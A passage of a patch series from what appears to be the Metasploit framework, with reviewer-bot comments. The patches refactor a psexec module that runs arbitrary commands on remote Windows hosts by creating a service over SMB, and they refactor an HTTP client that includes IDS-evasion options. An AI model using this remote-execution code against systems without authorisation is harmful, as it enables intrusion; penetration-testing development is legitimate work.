If you want to - # retrieve the output of your command you'll have to echo it - # to a .txt file and then use the get_output method to retrieve it - # Make sure to use the cleanup_after method when you are done. - # @param command [String] Should be a valid windows command - # @return true if everything wen't well - def psexec(command) + # This method executes a single windows command. If you want to + # retrieve the output of your command you'll have to echo it + # to a .txt file and then use the get_output method to retrieve it + # Make sure to use the cleanup_after method when you are done. + # @param command [String] Should be a valid windows command + # @return true if everything wen't well + def psexec(command) - simple.connect("\\\\#{datastore['RHOST']}\\IPC$") + simple.connect("\\\\#{datastore['RHOST']}\\IPC$") - handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"]) - vprint_status("#{peer} - Binding to #{handle} ...") - dcerpc_bind(handle) - vprint_status("#{peer} - Bound to #{handle} ...") + handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"]) + vprint_status("#{peer} - Binding to #{handle} ...") + dcerpc_bind(handle) + vprint_status("#{peer} - Bound to #{handle} ...") - vprint_status("#{peer} - Obtaining a service manager handle...") - scm_handle = nil - stubdata = - NDR.uwstring("\\\\#{rhost}") + NDR.long(0) + NDR.long(0xF003F) - begin - response = dcerpc.call(0x0f, stubdata) - if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil - scm_handle = dcerpc.last_response.stub_data[0,20] - end - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") - return false - end + vprint_status("#{peer} - Obtaining a service manager handle...") + scm_handle = nil + stubdata = + NDR.uwstring("\\\\#{rhost}") + NDR.long(0) + NDR.long(0xF003F) + begin + response = dcerpc.call(0x0f, stubdata) + if dcerpc.last_response != nil and dcerpc.last_response.stub_data != 
nil + scm_handle = dcerpc.last_response.stub_data[0,20] + end + rescue ::Exception => e + print_error("#{peer} - Error: #{e}") + return false + end - servicename = Rex::Text.rand_text_alpha(11) - displayname = Rex::Text.rand_text_alpha(16) - holdhandle = scm_handle - svc_handle = nil - svc_status = nil + servicename = Rex::Text.rand_text_alpha(11) + displayname = Rex::Text.rand_text_alpha(16) + holdhandle = scm_handle + svc_handle = nil + svc_status = nil - stubdata = - scm_handle + NDR.wstring(servicename) + NDR.uwstring(displayname) + + stubdata = + scm_handle + NDR.wstring(servicename) + NDR.uwstring(displayname) + - NDR.long(0x0F01FF) + # Access: MAX - NDR.long(0x00000110) + # Type: Interactive, Own process - NDR.long(0x00000003) + # Start: Demand - NDR.long(0x00000000) + # Errors: Ignore - NDR.wstring( command ) + - NDR.long(0) + # LoadOrderGroup - NDR.long(0) + # Dependencies - NDR.long(0) + # Service Start - NDR.long(0) + # Password - NDR.long(0) + # Password - NDR.long(0) + # Password - NDR.long(0) # Password - begin - vprint_status("#{peer} - Creating the service...") - response = dcerpc.call(0x0c, stubdata) - if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil - svc_handle = dcerpc.last_response.stub_data[0,20] - svc_status = dcerpc.last_response.stub_data[24,4] - end - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") - return false - end + NDR.long(0x0F01FF) + # Access: MAX + NDR.long(0x00000110) + # Type: Interactive, Own process + NDR.long(0x00000003) + # Start: Demand + NDR.long(0x00000000) + # Errors: Ignore + NDR.wstring( command ) + + NDR.long(0) + # LoadOrderGroup + NDR.long(0) + # Dependencies + NDR.long(0) + # Service Start + NDR.long(0) + # Password + NDR.long(0) + # Password + NDR.long(0) + # Password + NDR.long(0) # Password + begin + vprint_status("#{peer} - Creating the service...") + response = dcerpc.call(0x0c, stubdata) + if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil + 
svc_handle = dcerpc.last_response.stub_data[0,20] + svc_status = dcerpc.last_response.stub_data[24,4] + end + rescue ::Exception => e + print_error("#{peer} - Error: #{e}") + return false + end - vprint_status("#{peer} - Closing service handle...") - begin - response = dcerpc.call(0x0, svc_handle) - rescue ::Exception - end + vprint_status("#{peer} - Closing service handle...") + begin + response = dcerpc.call(0x0, svc_handle) + rescue ::Exception + end - vprint_status("#{peer} - Opening service...") - begin - stubdata = - scm_handle + NDR.wstring(servicename) + NDR.long(0xF01FF) + vprint_status("#{peer} - Opening service...") + begin + stubdata = + scm_handle + NDR.wstring(servicename) + NDR.long(0xF01FF) - response = dcerpc.call(0x10, stubdata) - if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil - svc_handle = dcerpc.last_response.stub_data[0,20] - end - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") - return false - end + response = dcerpc.call(0x10, stubdata) + if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil + svc_handle = dcerpc.last_response.stub_data[0,20] + end + rescue ::Exception => e + print_error("#{peer} - Error: #{e}") + return false + end - vprint_status("#{peer} - Starting the service...") - stubdata = - svc_handle + NDR.long(0) + NDR.long(0) - begin - response = dcerpc.call(0x13, stubdata) - if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil - end - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") - return false - end + vprint_status("#{peer} - Starting the service...") + stubdata = + svc_handle + NDR.long(0) + NDR.long(0) + begin + response = dcerpc.call(0x13, stubdata) + if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil + end + rescue ::Exception => e + print_error("#{peer} - Error: #{e}") + return false + end - vprint_status("#{peer} - Removing the service...") - stubdata = - svc_handle - begin - response = dcerpc.call(0x02, 
stubdata) - if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil - end - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") - end + vprint_status("#{peer} - Removing the service...") + stubdata = + svc_handle + begin + response = dcerpc.call(0x02, stubdata) + if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil + end + rescue ::Exception => e + print_error("#{peer} - Error: #{e}") + end - vprint_status("#{peer} - Closing service handle...") - begin - response = dcerpc.call(0x0, svc_handle) - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") - end + vprint_status("#{peer} - Closing service handle...") + begin + response = dcerpc.call(0x0, svc_handle) + rescue ::Exception => e + print_error("#{peer} - Error: #{e}") + end - select(nil, nil, nil, 1.0) - simple.disconnect("\\\\#{datastore['RHOST']}\\IPC$") - return true - end + select(nil, nil, nil, 1.0) + simple.disconnect("\\\\#{datastore['RHOST']}\\IPC$") + return true + end - # This method is called by file_dropper to remove files droped - # By your module - # - # @example - # file_rm('C:\WINDOWS\Temp\output.txt') - # - # @param file [String] Full path to a file on the remote host - # @return [StandardError] only in the event of an error - def file_rm(file) - delete = "%COMSPEC% /C del #{file}" - vprint_status("#{peer} - Deleting #{file}") - psexec(delete) - end + # This method is called by file_dropper to remove files droped + # By your module + # + # @example + # file_rm('C:\WINDOWS\Temp\output.txt') + # + # @param file [String] Full path to a file on the remote host + # @return [StandardError] only in the event of an error + def file_rm(file) + delete = "%COMSPEC% /C del #{file}" + vprint_status("#{peer} - Deleting #{file}") + psexec(delete) + end - # This method stores files in an Instance array - # The files are then deleted from the remote host once - # the cleanup_after method is called - # - # @example - # 
register_file_for_cleanup("C:\\WINDOWS\\Temp\\output.txt") - # @param file [String] Full path to the file on the remote host - def register_file_for_cleanup(*file) - @dropped_files ||= [] - @dropped_files += file - end + # This method stores files in an Instance array + # The files are then deleted from the remote host once + # the cleanup_after method is called + # + # @example + # register_file_for_cleanup("C:\\WINDOWS\\Temp\\output.txt") + # @param file [String] Full path to the file on the remote host + def register_file_for_cleanup(*file) + @dropped_files ||= [] + @dropped_files += file + end - # This method removes any files that were dropped on the remote system - # and marked with the register_file_for_cleanup method - def cleanup_after - print_status("#{peer} - Removing files dropped by your module/exploit") - if !@dropped_files - return - end - begin - @dropped_files.delete_if do |file| - file_rm(file) - print_good("#{peer} - Deleted #{file}") - end - rescue ::Exception => cleanup_error - print_error("#{peer} - Unable to delte #{file}. #{cleanup_error}") - end - end + # This method removes any files that were dropped on the remote system + # and marked with the register_file_for_cleanup method + def cleanup_after + print_status("#{peer} - Removing files dropped by your module/exploit") + if !@dropped_files + return + end + begin + @dropped_files.delete_if do |file| + file_rm(file) + print_good("#{peer} - Deleted #{file}") + end + rescue ::Exception => cleanup_error + print_error("#{peer} - Unable to delte #{file}. #{cleanup_error}") + end + end end From 81625121f2ba68ef3ff7d76fc7f7e61e584a33f0 Mon Sep 17 00:00:00 2001 From: Royce Davis Date: Tue, 22 Jan 2013 09:49:03 -0600 Subject: [PATCH 06/87] Cleaned up some code spacing --- lib/msf/core/exploit/psexec.rb | 18 ++++-------------- 1 file changed, 4 insertions(+), 14 deletions(-) diff --git a/lib/msf/core/exploit/psexec.rb b/lib/msf/core/exploit/psexec.rb index b10e1453f3..b4292004da 100644 
--- a/lib/msf/core/exploit/psexec.rb +++ b/lib/msf/core/exploit/psexec.rb @@ -13,6 +13,7 @@ module Exploit::Remote::Psexec include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB + # Retrives output from the executed command # @param smbshare [String] The SMBshare to connect to. Usually C$ # @param ip [IP Address] Remote Host to Connect To @@ -21,7 +22,6 @@ module Exploit::Remote::Psexec # @return output or nil if fails def get_output(smbshare, ip, file) begin - print_status("Getting the command output...") simple.connect("\\\\#{ip}\\#{smbshare}") outfile = simple.open(file, 'ro') output = outfile.read @@ -42,14 +42,11 @@ module Exploit::Remote::Psexec # @param command [String] Should be a valid windows command # @return true if everything wen't well def psexec(command) - simple.connect("\\\\#{datastore['RHOST']}\\IPC$") - handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"]) vprint_status("#{peer} - Binding to #{handle} ...") dcerpc_bind(handle) vprint_status("#{peer} - Bound to #{handle} ...") - vprint_status("#{peer} - Obtaining a service manager handle...") scm_handle = nil stubdata = @@ -63,16 +60,13 @@ module Exploit::Remote::Psexec print_error("#{peer} - Error: #{e}") return false end - servicename = Rex::Text.rand_text_alpha(11) displayname = Rex::Text.rand_text_alpha(16) holdhandle = scm_handle svc_handle = nil svc_status = nil - stubdata = scm_handle + NDR.wstring(servicename) + NDR.uwstring(displayname) + - NDR.long(0x0F01FF) + # Access: MAX NDR.long(0x00000110) + # Type: Interactive, Own process NDR.long(0x00000003) + # Start: Demand 
@@ -96,18 +90,15 @@ module Exploit::Remote::Psexec print_error("#{peer} - Error: #{e}") return false end - vprint_status("#{peer} - Closing service handle...") begin response = dcerpc.call(0x0, svc_handle) rescue ::Exception end - vprint_status("#{peer} - Opening service...") begin stubdata = scm_handle + NDR.wstring(servicename) + NDR.long(0xF01FF) - response = dcerpc.call(0x10, stubdata) if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil svc_handle = dcerpc.last_response.stub_data[0,20] @@ -116,7 +107,6 @@ module Exploit::Remote::Psexec print_error("#{peer} - Error: #{e}") return false end - vprint_status("#{peer} - Starting the service...") stubdata = svc_handle + NDR.long(0) + NDR.long(0) @@ -128,7 +118,6 @@ module Exploit::Remote::Psexec print_error("#{peer} - Error: #{e}") return false end - vprint_status("#{peer} - Removing the service...") stubdata = svc_handle @@ -139,19 +128,18 @@ module Exploit::Remote::Psexec rescue ::Exception => e print_error("#{peer} - Error: #{e}") end - vprint_status("#{peer} - Closing service handle...") begin response = dcerpc.call(0x0, svc_handle) rescue ::Exception => e print_error("#{peer} - Error: #{e}") end - select(nil, nil, nil, 1.0) simple.disconnect("\\\\#{datastore['RHOST']}\\IPC$") return true end + # This method is called by file_dropper to remove files droped # By your module # @@ -166,6 +154,7 @@ module Exploit::Remote::Psexec psexec(delete) end + # This method stores files in an Instance array # The files are then deleted from the remote host once # the cleanup_after method is called @@ -178,6 +167,7 @@ module Exploit::Remote::Psexec @dropped_files += file end + # This method removes any files that were dropped on the remote system # and marked with the register_file_for_cleanup method def cleanup_after From 7faaa635d380e6e510729ade4eb0a3d0aa0b35b5 Mon Sep 17 00:00:00 2001 
From: Royce Davis Date: Sun, 3 Feb 2013 18:46:41 -0600 Subject: [PATCH 07/87] Fixed exception handling to use smb::proto --- lib/msf/core/exploit/psexec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/psexec.rb b/lib/msf/core/exploit/psexec.rb index b4292004da..f63a93f8e1 100644 --- a/lib/msf/core/exploit/psexec.rb +++ b/lib/msf/core/exploit/psexec.rb @@ -180,7 +180,7 @@ module Exploit::Remote::Psexec file_rm(file) print_good("#{peer} - Deleted #{file}") end - rescue ::Exception => cleanup_error + rescue Rex::Proto::SMB::Exceptions::ErrorCode => cleanup_error print_error("#{peer} - Unable to delte #{file}. #{cleanup_error}") end end From a902480576a904f464b43a365cd002c81361eaf6 Mon Sep 17 00:00:00 2001 From: James Lee Date: Sun, 17 Feb 2013 06:57:35 -0600 Subject: [PATCH 08/87] Break out subclasses into their own files --- lib/rex/proto/smb/simpleclient.rb | 154 +------------------- lib/rex/proto/smb/simpleclient/open_file.rb | 106 ++++++++++++++ lib/rex/proto/smb/simpleclient/open_pipe.rb | 57 ++++++++ 3 files changed, 168 insertions(+), 149 deletions(-) create mode 100644 lib/rex/proto/smb/simpleclient/open_file.rb create mode 100644 lib/rex/proto/smb/simpleclient/open_pipe.rb diff --git a/lib/rex/proto/smb/simpleclient.rb b/lib/rex/proto/smb/simpleclient.rb index 454a3c694e..c0cd9d02e9 100644 --- a/lib/rex/proto/smb/simpleclient.rb +++ b/lib/rex/proto/smb/simpleclient.rb @@ -12,6 +12,8 @@ require 'rex/proto/smb/evasions' require 'rex/proto/smb/crypt' require 'rex/proto/smb/utils' require 'rex/proto/smb/client' +require 'rex/proto/smb/simpleclient/open_file' +require 'rex/proto/smb/simpleclient/open_pipe' # Some short-hand class aliases CONST = Rex::Proto::SMB::Constants 
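Review bot: The `print_error` line under the new `rescue` interpolates `#{file}`, but `file` is the parameter of the `delete_if` block that closes one line earlier, so it is out of scope in the handler. Unless the including module defines a `file` method, the handler would raise NameError and hide the SMB error it is meant to report; narrowing the exception class does not change that. Moving the `begin`/`rescue` inside the block keeps `file` in scope and lets the remaining files still be attempted after one failure. The `psexec` method shown earlier in this series returns false rather than raising when a DCERPC call fails, so the sketch below also checks `file_rm`'s result before printing `Deleted`, uses it as the block value that decides which entries leave `@dropped_files`, and fixes the `delte` typo. cleanup_after begins above this hunk.

```ruby
@dropped_files.delete_if do |file|
  begin
    # file_rm hands back psexec's result; report success only when it is truthy
    removed = file_rm(file)
    print_good("#{peer} - Deleted #{file}") if removed
    removed
  rescue Rex::Proto::SMB::Exceptions::ErrorCode => cleanup_error
    print_error("#{peer} - Unable to delete #{file}. #{cleanup_error}")
    false
  end
end
```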
@@ -20,157 +22,11 @@ UTILS = Rex::Proto::SMB::Utils XCEPT = Rex::Proto::SMB::Exceptions EVADE = Rex::Proto::SMB::Evasions - - class OpenFile - attr_accessor :name, :tree_id, :file_id, :mode, :client, :chunk_size - - def initialize(client, name, tree_id, file_id) - self.client = client - self.name = name - self.tree_id = tree_id - self.file_id = file_id - self.chunk_size = 48000 - end - - def delete - begin - self.close - rescue - end - self.client.delete(self.name, self.tree_id) - end - - # Close this open file - def close - self.client.close(self.file_id, self.tree_id) - end - - # Read data from the file - def read(length = nil, offset = 0) - if (length == nil) - data = '' - fptr = offset - ok = self.client.read(self.file_id, fptr, self.chunk_size) - while (ok and ok['Payload'].v['DataLenLow'] > 0) - buff = ok.to_s.slice( - ok['Payload'].v['DataOffset'] + 4, - ok['Payload'].v['DataLenLow'] - ) - data << buff - if ok['Payload'].v['Remaining'] == 0 - break - end - fptr += ok['Payload'].v['DataLenLow'] - - begin - ok = self.client.read(self.file_id, fptr, self.chunk_size) - rescue XCEPT::ErrorCode => e - case e.error_code - when 0x00050001 - # Novell fires off an access denied error on EOF - ok = nil - else - raise e - end - end - end - - return data - else - ok = self.client.read(self.file_id, offset, length) - data = ok.to_s.slice( - ok['Payload'].v['DataOffset'] + 4, - ok['Payload'].v['DataLenLow'] - ) - return data - end - end - - def << (data) - self.write(data) - end - - # Write data to the file - def write(data, offset = 0) - # Track our offset into the remote file - fptr = offset - - # Duplicate the data so we can use slice! 
- data = data.dup - - # Take our first chunk of bytes - chunk = data.slice!(0, self.chunk_size) - - # Keep writing data until we run out - while (chunk.length > 0) - ok = self.client.write(self.file_id, fptr, chunk) - cl = ok['Payload'].v['CountLow'] - - # Partial write, push the failed data back into the queue - if (cl != chunk.length) - data = chunk.slice(cl - 1, chunk.length - cl) + data - end - - # Increment our painter and grab the next chunk - fptr += cl - chunk = data.slice!(0, self.chunk_size) - end - end - end - - class OpenPipe < OpenFile - - # Valid modes are: 'trans' and 'rw' - attr_accessor :mode - - def initialize(*args) - super(*args) - self.mode = 'rw' - @buff = '' - end - - def read_buffer(length, offset=0) - length ||= @buff.length - @buff.slice!(0, length) - end - - def read(length = nil, offset = 0) - case self.mode - when 'trans' - read_buffer(length, offset) - when 'rw' - super(length, offset) - else - raise ArgumentError - end - end - - def write(data, offset = 0) - case self.mode - - when 'trans' - write_trans(data, offset) - when 'rw' - super(data, offset) - else - raise ArgumentError - end - end - - def write_trans(data, offset=0) - ack = self.client.trans_named_pipe(self.file_id, data) - doff = ack['Payload'].v['DataOffset'] - dlen = ack['Payload'].v['DataCount'] - @buff << ack.to_s[4+doff, dlen] - end - end - - # Public accessors -attr_accessor :last_error +attr_accessor :last_error # Private accessors -attr_accessor :socket, :client, :direct, :shares, :last_share +attr_accessor :socket, :client, :direct, :shares, :last_share # Pass the socket object and a boolean indicating whether the socket is netbios or cifs def initialize(socket, direct = false) 
@@ -180,7 +36,7 @@ attr_accessor :socket, :client, :direct, :shares, :last_share self.shares = { } end - def login( name = '', user = '', pass = '', domain = '', + def login(name = '', user = '', pass = '', domain = '', verify_signature = false, usentlmv2 = false, usentlm2_session = true, send_lm = true, use_lanman_key = false, send_ntlm = true, native_os = 'Windows 2000 2195', native_lm = 'Windows 2000 5.0', spnopt = {}) diff --git a/lib/rex/proto/smb/simpleclient/open_file.rb b/lib/rex/proto/smb/simpleclient/open_file.rb new file mode 100644 index 0000000000..66696dfae4 --- /dev/null +++ b/lib/rex/proto/smb/simpleclient/open_file.rb 
@@ -0,0 +1,106 @@ +# -*- coding: binary -*- +module Rex +module Proto +module SMB +class SimpleClient + +class OpenFile + attr_accessor :name, :tree_id, :file_id, :mode, :client, :chunk_size + + def initialize(client, name, tree_id, file_id) + self.client = client + self.name = name + self.tree_id = tree_id + self.file_id = file_id + self.chunk_size = 48000 + end + + def delete + begin + self.close + rescue + end + self.client.delete(self.name, self.tree_id) + end + + # Close this open file + def close + self.client.close(self.file_id, self.tree_id) + end + + # Read data from the file + def read(length = nil, offset = 0) + if (length == nil) + data = '' + fptr = offset + ok = self.client.read(self.file_id, fptr, self.chunk_size) + while (ok and ok['Payload'].v['DataLenLow'] > 0) + buff = ok.to_s.slice( + ok['Payload'].v['DataOffset'] + 4, + ok['Payload'].v['DataLenLow'] + ) + data << buff + if ok['Payload'].v['Remaining'] == 0 + break + end + fptr += ok['Payload'].v['DataLenLow'] + + begin + ok = self.client.read(self.file_id, fptr, self.chunk_size) + rescue XCEPT::ErrorCode => e + case e.error_code + when 0x00050001 + # Novell fires off an access denied error on EOF + ok = nil + else + raise e + end + end + end + + return data + else + ok = self.client.read(self.file_id, offset, length) + data = ok.to_s.slice( + ok['Payload'].v['DataOffset'] + 4, + ok['Payload'].v['DataLenLow'] + ) + return data + end + end + + def << (data) + self.write(data) + end + + # Write data to the file + def write(data, offset = 0) + # Track our offset into the remote file + fptr = offset + + # Duplicate the data so we can use slice! 
+ data = data.dup + + # Take our first chunk of bytes + chunk = data.slice!(0, self.chunk_size) + + # Keep writing data until we run out + while (chunk.length > 0) + ok = self.client.write(self.file_id, fptr, chunk) + cl = ok['Payload'].v['CountLow'] + + # Partial write, push the failed data back into the queue + if (cl != chunk.length) + data = chunk.slice(cl - 1, chunk.length - cl) + data + end + + # Increment our painter and grab the next chunk + fptr += cl + chunk = data.slice!(0, self.chunk_size) + end + end +end +end +end +end +end diff --git a/lib/rex/proto/smb/simpleclient/open_pipe.rb b/lib/rex/proto/smb/simpleclient/open_pipe.rb new file mode 100644 index 0000000000..387ee4ff9a --- /dev/null +++ b/lib/rex/proto/smb/simpleclient/open_pipe.rb @@ -0,0 +1,57 @@ +# -*- coding: binary -*- + +module Rex +module Proto +module SMB +class SimpleClient + +class OpenPipe < OpenFile + + # Valid modes are: 'trans' and 'rw' + attr_accessor :mode + + def initialize(*args) + super(*args) + self.mode = 'rw' + @buff = '' + end + + def read_buffer(length, offset=0) + length ||= @buff.length + @buff.slice!(0, length) + end + + def read(length = nil, offset = 0) + case self.mode + when 'trans' + read_buffer(length, offset) + when 'rw' + super(length, offset) + else + raise ArgumentError + end + end + + def write(data, offset = 0) + case self.mode + + when 'trans' + write_trans(data, offset) + when 'rw' + super(data, offset) + else + raise ArgumentError + end + end + + def write_trans(data, offset=0) + ack = self.client.trans_named_pipe(self.file_id, data) + doff = ack['Payload'].v['DataOffset'] + dlen = ack['Payload'].v['DataCount'] + @buff << ack.to_s[4+doff, dlen] + end +end +end +end +end +end From dd26b081976491bf91a89eaa08c9a9db3bf001e5 Mon Sep 17 00:00:00 2001 
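Review bot: In `OpenFile#write` the partial-write branch requeues the wrong bytes: `chunk.slice(cl - 1, chunk.length - cl)` starts one byte before the first unwritten byte. After a short write the last acknowledged byte is sent again and the final byte of the chunk is dropped, which corrupts the remote file. The unwritten remainder starts at index `cl`, so the line should read `data = chunk.slice(cl, chunk.length - cl) + data`. The code is moved unchanged from simpleclient.rb, but the new file is a good place to fix it. With the corrected slice a `CountLow` of 0 would never advance `fptr`, so a guard that raises when `cl` is zero is worth adding alongside.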
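Review bot: open_pipe.rb names `OpenFile` as its superclass but does not load it, so the file only works when open_file.rb has already been required. simpleclient.rb requires the two in the right order in this commit, but loading open_pipe.rb on its own would presumably fail with NameError. Adding `require 'rex/proto/smb/simpleclient/open_file'` at the top of the file makes the dependency explicit. Separately, the `else` branches of `read` and `write` raise a bare `ArgumentError`; a message such as `raise ArgumentError, "unknown pipe mode #{self.mode.inspect}"` would tell the caller which value was rejected.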
From: David Maloney Date: Sun, 17 Feb 2013 19:25:27 -0600 Subject: [PATCH 09/87] first run at Clientrequest object need a reliable object class for request_raw and request_cgi so that we can manipulate requests in a safe and sane manner. It is not a eprfect solution, but should fix what we need for the auth work. --- lib/rex/proto/http.rb | 1 + lib/rex/proto/http/client.rb | 444 ++------------------------ lib/rex/proto/http/client_request.rb | 454 +++++++++++++++++++++++++++ 3 files changed, 480 insertions(+), 419 deletions(-) create mode 100644 lib/rex/proto/http/client_request.rb diff --git a/lib/rex/proto/http.rb b/lib/rex/proto/http.rb index 1ff65061ec..85a4f31e3c 100644 --- a/lib/rex/proto/http.rb +++ b/lib/rex/proto/http.rb @@ -4,3 +4,4 @@ require 'rex/proto/http/request' require 'rex/proto/http/response' require 'rex/proto/http/client' require 'rex/proto/http/server' +require 'rex/proto/http/client_request' \ No newline at end of file diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 75ba1f9574..690cd58f4d 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -8,6 +8,8 @@ require 'rex/proto/ntlm/constants' require 'rex/proto/ntlm/utils' require 'rex/proto/ntlm/exceptions' +require 'pry' + module Rex module Proto module Http 
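Review bot: `require 'pry'` in lib/rex/proto/http/client.rb looks like a leftover from a debugging session; nothing in the hunks shown for this file uses it. It makes loading the HTTP client depend on an interactive debugger gem being installed, so the require would raise LoadError on a host without it. Library code should not pull a debugger into every process that loads it. Drop the `require 'pry'` line and the blank line added after it.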
@@ -240,103 +242,32 @@ class Client # # @return [Request] def request_cgi(opts={}) - c_ag = opts['agent'] || config['agent'] - c_auth = opts['basic_auth'] || config['basic_auth'] || '' - c_body = opts['data'] || '' - c_cgi = opts['uri'] || '/' - c_conn = opts['connection'] - c_cook = opts['cookie'] || config['cookie'] - c_enc = opts['encode'] || false - c_enc_p = (opts['encode_params'] == true or opts['encode_params'].nil? ? true : false) - c_head = opts['headers'] || config['headers'] || {} - c_host = opts['vhost'] || config['vhost'] - c_meth = opts['method'] || 'GET' - c_path = opts['path_info'] - c_prot = opts['proto'] || 'HTTP' - c_qs = opts['query'] || '' - c_rawh = opts['raw_headers'] || config['raw_headers'] || '' - c_type = opts['ctype'] || 'application/x-www-form-urlencoded' - c_varg = opts['vars_get'] || {} - c_varp = opts['vars_post'] || {} - c_vers = opts['version'] || config['version'] || '1.1' + opts['agent'] ||= config['agent'] + opts['basic_auth'] = opts['basic_auth'] || config['basic_auth'] || '' + opts['data'] ||= '' + opts['uri'] ||= '/' + opts['cookie'] ||= config['cookie'] + opts['encode'] ||= false + opts['headers'] ||= config['headers'] || {} + opts['vhost'] ||= config['vhost'] + opts['method'] ||= 'GET' + opts['proto'] ||= 'HTTP' + opts['query'] ||= '' + opts['raw_headers'] = opts['raw_headers'] || config['raw_headers'] || '' + opts['ctype'] ||= 'application/x-www-form-urlencoded' + opts['vars_get'] ||= {} + opts['vars_post'] ||= {} + opts['version'] = opts['version'] || config['version'] || '1.1' + opts['cgi'] = true + opts['port'] = self.port - uri = set_cgi(c_cgi) - qstr = c_qs - pstr = c_body - - if (config['pad_get_params']) - 1.upto(config['pad_get_params_count'].to_i) do |i| - qstr << '&' if qstr.length > 0 - qstr << set_encode_uri(Rex::Text.rand_text_alphanumeric(rand(32)+1)) - qstr << '=' - qstr << set_encode_uri(Rex::Text.rand_text_alphanumeric(rand(32)+1)) - end + if opts['encode_params'] == true or opts['encode_params'].nil? 
+ opts['encode_params'] = true + else + opts['encode_params'] = false end - c_varg.each_pair do |var,val| - qstr << '&' if qstr.length > 0 - qstr << (c_enc_p ? set_encode_uri(var) : var) - qstr << '=' - qstr << (c_enc_p ? set_encode_uri(val) : val) - end - - if (config['pad_post_params']) - 1.upto(config['pad_post_params_count'].to_i) do |i| - rand_var = Rex::Text.rand_text_alphanumeric(rand(32)+1) - rand_val = Rex::Text.rand_text_alphanumeric(rand(32)+1) - pstr << '&' if pstr.length > 0 - pstr << (c_enc_p ? set_encode_uri(rand_var) : rand_var) - pstr << '=' - pstr << (c_enc_p ? set_encode_uri(rand_val) : rand_val) - end - end - - c_varp.each_pair do |var,val| - pstr << '&' if pstr.length > 0 - pstr << (c_enc_p ? set_encode_uri(var) : var) - pstr << '=' - pstr << (c_enc_p ? set_encode_uri(val) : val) - end - - req = '' - req << set_method(c_meth) - req << set_method_uri_spacer() - req << set_uri_prepend() - req << (c_enc ? set_encode_uri(uri):uri) - - if (qstr.length > 0) - req << '?' - req << qstr - end - - req << set_path_info(c_path) - req << set_uri_append() - req << set_uri_version_spacer() - req << set_version(c_prot, c_vers) - req << set_host_header(c_host) - req << set_agent_header(c_ag) - - if (c_auth.length > 0) - unless c_head['Authorization'] and c_head['Authorization'].include? "Basic" - req << set_basic_auth_header(c_auth) - end - end - - req << set_cookie_header(c_cook) - req << set_connection_header(c_conn) - req << set_extra_headers(c_head) - - req << set_content_type_header(c_type) - req << set_content_len_header(pstr.length) - req << set_chunked_header() - req << set_raw_headers(c_rawh) - req << set_body(pstr) - - request = Request.new - request.parse(req) - request.options = opts - - request + req = ClientRequest.new(opts,self.config) end # 
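Review bot: `request_cgi` now writes its defaults straight into the caller's hash (`opts['agent'] ||= config['agent']`, `opts['cgi'] = true`, `opts['port'] = self.port` and the rest). A caller that reuses one options hash for several requests therefore sees it modified after the first call, and a frozen hash would raise. Starting the method with `opts = opts.dup` keeps the defaults local. The YARD tag in the context above still says `@return [Request]` while the body now ends in `ClientRequest.new(opts,self.config)`; update it to `# @return [ClientRequest]` unless ClientRequest subclasses Request, which this hunk does not show. The unused `req =` assignment on the last line can be dropped, and the method itself begins above the hunk.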
@@ -855,284 +786,6 @@ class Client pipeline end - # - # Return the encoded URI - # ['none','hex-normal', 'hex-all', 'u-normal', 'u-all'] - def set_encode_uri(uri) - a = uri - self.config['uri_encode_count'].times { - a = Rex::Text.uri_encode(a, self.config['uri_encode_mode']) - } - return a - end - - # - # Return the encoded query string - # - def set_encode_qs(qs) - a = qs - self.config['uri_encode_count'].times { - a = Rex::Text.uri_encode(a, self.config['uri_encode_mode']) - } - return a - end - - # - # Return the uri - # - def set_uri(uri) - - if (self.config['uri_dir_self_reference']) - uri.gsub!('/', '/./') - end - - if (self.config['uri_dir_fake_relative']) - buf = "" - uri.split('/').each do |part| - cnt = rand(8)+2 - 1.upto(cnt) { |idx| - buf << "/" + Rex::Text.rand_text_alphanumeric(rand(32)+1) - } - buf << ("/.." * cnt) - buf << "/" + part - end - uri = buf - end - - if (self.config['uri_full_url']) - url = self.ssl ? "https" : "http" - url << self.config['vhost'] - url << ((self.port == 80) ? "" : ":#{self.port}") - url << uri - url - else - uri - end - end - - # - # Return the cgi - # - def set_cgi(uri) - - if (self.config['uri_dir_self_reference']) - uri.gsub!('/', '/./') - end - - if (self.config['uri_dir_fake_relative']) - buf = "" - uri.split('/').each do |part| - cnt = rand(8)+2 - 1.upto(cnt) { |idx| - buf << "/" + Rex::Text.rand_text_alphanumeric(rand(32)+1) - } - buf << ("/.." * cnt) - buf << "/" + part - end - uri = buf - end - - url = uri - - if (self.config['uri_full_url']) - url = self.ssl ? "https" : "http" - url << self.config['vhost'] - url << (self.port == 80) ? 
